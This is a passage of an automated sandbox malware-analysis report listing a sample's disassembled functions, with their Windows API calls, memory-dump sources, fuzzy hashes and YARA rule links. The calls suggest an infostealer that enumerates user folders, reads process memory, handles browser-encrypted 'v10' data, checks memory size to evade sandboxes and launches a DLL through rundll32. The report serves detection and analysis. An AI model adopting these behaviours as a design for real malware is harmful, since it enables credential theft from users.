                                                                                                                                                                                                                                                                • Part of subcall function 00904667: RtlAllocateHeap.NTDLL(00000000), ref: 0090467B
                                                                                                                                                                                                                                                                • Part of subcall function 00904667: GetComputerNameA.KERNEL32(?,00000104), ref: 00904693
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00624D20,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 009039F1
                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00903A0F
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00903A20
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 00903A2B
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,00624D20,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 00903A41
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00903A49
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2525456742-0
                                                                                                                                                                                                                                                              • Opcode ID: 46515f5eae24d0a6147c7cb61a4b11b40ebb98da62e4e0d1738e1df983633f24
                                                                                                                                                                                                                                                              • Instruction ID: 73defcbbdd4a42af91343c4dd8aea4f79125e37d4808be0e8eb010503ed22a71
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46515f5eae24d0a6147c7cb61a4b11b40ebb98da62e4e0d1738e1df983633f24
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D312AB1E44208AEDB14FBF0DC56FBDB779BF94710F104518B112A62D2EF746A05CA62
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F9607 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F9633
                                                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 008F9658
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 008F9678
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(000000FF,?,00000000,008F16B6,00000000), ref: 008F96A1
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(008F16B6), ref: 008F96D7
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 008F96E1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2311089104-0
                                                                                                                                                                                                                                                              • Opcode ID: f4e0d313ddcfb566cad0ad739db1598a31e32847b8e3d9904cd15aeed94fad13
                                                                                                                                                                                                                                                              • Instruction ID: 89e0b7de04a8c9973cc3c0250d49d8ca958c17fa3e0653c028d8d89e5e601826
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4e0d313ddcfb566cad0ad739db1598a31e32847b8e3d9904cd15aeed94fad13
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9312C74A0020DEFDB24DFA4C895BAE77B9FF58314F108159E911E7290DB78A941CFA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00410FA0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00411307
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
                                                                                                                                                                                                                                                              • String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
                                                                                                                                                                                                                                                              • API String ID: 672783590-3078973353
                                                                                                                                                                                                                                                              • Opcode ID: ce24d530f826aae9115090267b766426043ee13ae648b95ca54e1aa72ad7c54d
                                                                                                                                                                                                                                                              • Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce24d530f826aae9115090267b766426043ee13ae648b95ca54e1aa72ad7c54d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00903E27 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00903E46
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00903E74
                                                                                                                                                                                                                                                                • Part of subcall function 00903AF7: strlen.MSVCRT ref: 00903B08
                                                                                                                                                                                                                                                                • Part of subcall function 00903AF7: strlen.MSVCRT ref: 00903B2C
                                                                                                                                                                                                                                                              • VirtualQueryEx.KERNEL32(00904234,00000000,?,0000001C), ref: 00903EB9
                                                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 00903FDA
                                                                                                                                                                                                                                                                • Part of subcall function 00903D07: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00903D1F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                              • API String ID: 2950663791-2766056989
                                                                                                                                                                                                                                                              • Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                                                              • Instruction ID: 4ece867f8317fd28a5a64a847710475a487b19e91fa39121273d8fb0453cf012
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0651C8B5E0010AAFDB04CF94D995AEFB7B9FF88300F14C519FA15A7280D735AA11CBA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004123F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00964928), ref: 0041244B
                                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00412471
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00412490
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004124A4
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0095FFC8), ref: 004124B7
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004124CB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00964F48), ref: 004124DF
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                                                • Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                                                                                                                                • Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                                                                                                                                • Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
                                                                                                                                                                                                                                                                • Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 167551676-0
                                                                                                                                                                                                                                                              • Opcode ID: acc70cf36dbfec09d389d1ed2ea4429dda18c407074bb3bf1997155f4afc4f64
                                                                                                                                                                                                                                                              • Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: acc70cf36dbfec09d389d1ed2ea4429dda18c407074bb3bf1997155f4afc4f64
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00902657 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624B00), ref: 009026B2
                                                                                                                                                                                                                                                                • Part of subcall function 00905747: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00905772
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 009026D8
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 009026F7
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0090270B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624A80), ref: 0090271E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00902732
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624AC0), ref: 00902746
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 009056F7: GetFileAttributesA.KERNEL32(00000000,?,008F1CAB,?,?,004215E4,?,?,0041D7E2), ref: 00905706
                                                                                                                                                                                                                                                                • Part of subcall function 00902457: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00902467
                                                                                                                                                                                                                                                                • Part of subcall function 00902457: RtlAllocateHeap.NTDLL(00000000), ref: 0090246E
                                                                                                                                                                                                                                                                • Part of subcall function 00902457: wsprintfA.USER32 ref: 0090248A
                                                                                                                                                                                                                                                                • Part of subcall function 00902457: FindFirstFileA.KERNEL32(?,?), ref: 009024A1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2540262943-0
                                                                                                                                                                                                                                                              • Opcode ID: b61a0952c10ec22559f8ff21dd1990cb91526dcb0d4337808e705547aad6b932
                                                                                                                                                                                                                                                              • Instruction ID: abdf27d5574ece2c8df4e15cc14eac61412b1a6505f8bc009e6f23714f642e5c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b61a0952c10ec22559f8ff21dd1990cb91526dcb0d4337808e705547aad6b932
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E93158B29006186BCB24F7B0DC89FEE737DAF98700F444589B7559A091DE749789CFA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F1447 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008F1465
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 008F147F
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 008F148D
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 008F14BB
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                              • API String ID: 3404098578-2766056989
                                                                                                                                                                                                                                                              • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                                              • Instruction ID: 4c687236334085cfd370117820d2a8106ee71aef91639d7f84f85d199932adf2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55011DB094030CFAEF10DBE0DD49BADBAB9FBA4705F248058E705B61C0D77499458B69
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040F200 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F228
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F36D
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0095C850,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 348468850-0
                                                                                                                                                                                                                                                              • Opcode ID: c4ed6abb7f9288a13799f0732a7354b091e8790bf399a7073ec44b8e4177caeb
                                                                                                                                                                                                                                                              • Instruction ID: 34556820f6e5338ba8e8a845a83fb71131f6fb13afd6d5a2f2d9a2f2ab0dc7f0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4ed6abb7f9288a13799f0732a7354b091e8790bf399a7073ec44b8e4177caeb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F514FB5A04209DFCB18CF54D595AAE7BB6FF48308F10817DE802AB390D734EA95CB95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004097F0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0095C850,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                                                                                                                                                                                                                              • String ID: @$v10
                                                                                                                                                                                                                                                              • API String ID: 1400469952-24753345
                                                                                                                                                                                                                                                              • Opcode ID: c5c0a24b69626de2f4c360779f6cc997777c19e15d5282a31dfc16e441a97116
                                                                                                                                                                                                                                                              • Instruction ID: 87859f0eaa1cac66c0422607c8296a2f5b7cfd88fdb957a476e5adb471fb7cf1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5c0a24b69626de2f4c360779f6cc997777c19e15d5282a31dfc16e441a97116
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00414EB0A00208EBDB04DFA5DC55FDE7B75BF44304F108119F909AB295DB78AE85CB98
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00908C93 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CodeInfoPageValidmemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 703783727-0
                                                                                                                                                                                                                                                              • Opcode ID: 6951f29c36c94b1d073d54955c1dcc818f8d448c9a4e816d0e34e81470273be2
                                                                                                                                                                                                                                                              • Instruction ID: f36b490e1830274e47f9a0146f27fd5bebf11f80b66ba2d7093143f136457b9e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6951f29c36c94b1d073d54955c1dcc818f8d448c9a4e816d0e34e81470273be2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E31F721B042958FEB25AF34D8843BBBFA8AF55310F1885BAD8D5DE1C2CB78C845D750
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00412980 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 004129BA
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D888), ref: 004129D7
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0095DC70), ref: 004129EB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D88C), ref: 004129FD
                                                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                                • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                                                • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                                                • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
